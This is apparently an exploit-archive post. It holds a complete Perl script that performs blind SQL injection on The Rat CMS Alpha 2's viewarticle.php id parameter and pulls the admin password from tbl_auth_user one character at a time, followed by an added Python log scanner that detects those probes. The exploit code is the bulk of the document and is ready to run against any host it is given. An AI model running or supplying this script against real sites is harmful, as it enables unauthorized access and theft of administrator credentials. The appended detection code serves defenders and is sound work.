The Rat CMS Alpha 2 (viewarticle.php id) Blind SQL Injection Exploit
Source: www.vfcocus.net Author: vfocus Published: 2009-01-05
#--+++=============================================================+++--#
#--+++====== The Rat CMS Alpha 2 Blind SQL Injection Exploit ======+++--#
#--+++=============================================================+++--#
#!/usr/bin/perl

use strict;
use warnings;
use IO::Socket;


sub query {
my $chr = shift;
my $pos = shift;
my $query = "'x' OR ASCII(SUBSTRING((SELECT user_password FROM tbl_auth_user WHERE user_id = 'theadmin'),${pos},1))=${chr}";
$query =~ s/ /%20/g;
$query =~ s/'/%27/g;
return $query;
}

sub check {
my $host = shift;
my $path = shift;
my $chr  = ord (shift);
my $pos  = shift;

my $sock = new IO::Socket::INET (
PeerHost => $host,
PeerPort => 80,
Proto    => "tcp",
);

my $query = query ($chr, $pos);
print $sock "GET ${path}/viewarticle.php?id=${query} HTTP1.1\r\n\r\n";
my $x;
while (<$sock>)
{
$x .= $_;
}

$x =~ s/\s/ /g;
$x =~ /<h1 align="center">(.+?)\/h1>/;
if (length ($1) > 1)
{
return 1;
}
else
{
return 0;
}

close ($sock);
}

sub usage {
print
"\n[+] The Rat CMS Alpha 2 Blind SQL Injection Exploit".
"\n[+] Author:  darkjoker".
"\n[+] Site:    http://darkjoker.net23.net".
"\n[+] Usage:   perl $0 <hostname> <path>".
"\n[+] Greetz:  certaindeath\n";
exit ();
}


my $host = shift;
my $path = shift or usage;

my @key = split '', 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789*';

my $pos = 1;
my $chr = 0;

while ($pos <= 32)
{
if (check ($host, $path, $key [$chr], $pos))
{
print $key [$chr];
$chr = -1;
$pos++;
}
$chr++;

}

print "\n";
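
For defenders, the requests this script sends to viewarticle.php leave a recognisable pattern in web server access logs: the same `id` payload repeated with a changing character position and character code. The Python below is an added example, not part of the original exploit or of the CMS; it assumes common/combined log format, and the `/cms` path, both client addresses and all sample log lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Client address and requested URL of a GET entry in a common/combined access log.
LOG_RE = re.compile(r'^(\S+) .*?"GET (\S+)[^"]*"')
# Probe shape sent by the script: one character of a subquery result compared
# with a numeric code, e.g. ASCII(SUBSTRING((SELECT ...),3,1))=65
PROBE_RE = re.compile(
    r"ASCII\s*\(\s*SUBSTRING\s*\(.*SELECT.*,\s*(\d+)\s*,\s*1\s*\)\s*\)\s*=\s*(\d+)",
    re.I | re.S)

def find_probes(lines, page="viewarticle.php"):
    """Return {client: {(position, char_code), ...}} for probes in the id parameter."""
    hits = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m or page not in m.group(2) or "?" not in m.group(2):
            continue
        query = unquote(m.group(2).split("?", 1)[1])  # undo %20 / %27 encoding
        for param in query.split("&"):
            name, _, value = param.partition("=")
            probe = PROBE_RE.search(value) if name == "id" else None
            if probe:
                hits[m.group(1)].add((int(probe.group(1)), int(probe.group(2))))
    return dict(hits)

def enumerating_clients(hits, min_probes=10):
    """Clients sending many distinct probes: character-by-character extraction."""
    return sorted(ip for ip, seen in hits.items() if len(seen) >= min_probes)

def constructed_sample():
    """Constructed log lines, not captured traffic; /cms and both IPs are assumptions."""
    tmpl = ('{ip} - - [05/Jan/2009:10:00:00 +0000] '
            '"GET /cms/viewarticle.php?id={id} HTTP/1.1" 200 512')
    probe = ("%27x%27%20OR%20ASCII(SUBSTRING((SELECT%20user_password%20FROM%20"
             "tbl_auth_user%20WHERE%20user_id%20=%20%27theadmin%27),{p},1))={c}")
    lines = [tmpl.format(ip="198.51.100.7", id=n) for n in (1, 2, 3)]
    for p in (1, 2):
        for c in map(ord, "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789*"):
            lines.append(tmpl.format(ip="203.0.113.9", id=probe.format(p=p, c=c)))
    return lines

if __name__ == "__main__":
    hits = find_probes(constructed_sample())
    for ip in enumerating_clients(hits):
        print(ip, "sent", len(hits[ip]), "distinct blind-SQLi probes")
```

The `min_probes` threshold separates a single malformed request from sustained extraction; tune it to the log window being reviewed.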

 